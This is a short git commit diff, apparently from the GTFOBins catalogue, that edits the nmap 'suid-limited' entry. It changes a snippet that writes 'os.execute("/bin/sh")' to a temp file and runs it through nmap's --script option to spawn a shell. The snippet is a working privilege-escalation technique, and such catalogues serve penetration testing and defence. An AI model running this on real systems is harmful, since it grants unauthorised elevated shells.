Fix nmap suid-limited

master
Emilio Pinna 2018-08-23 23:45:07 +01:00
parent 8fb329ca92
commit e84ec807a1
1 changed files with 1 additions and 1 deletions

View File

@ -86,6 +86,6 @@ functions:
- description: Input echo is disabled.
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh -p")' > $TF
echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF
---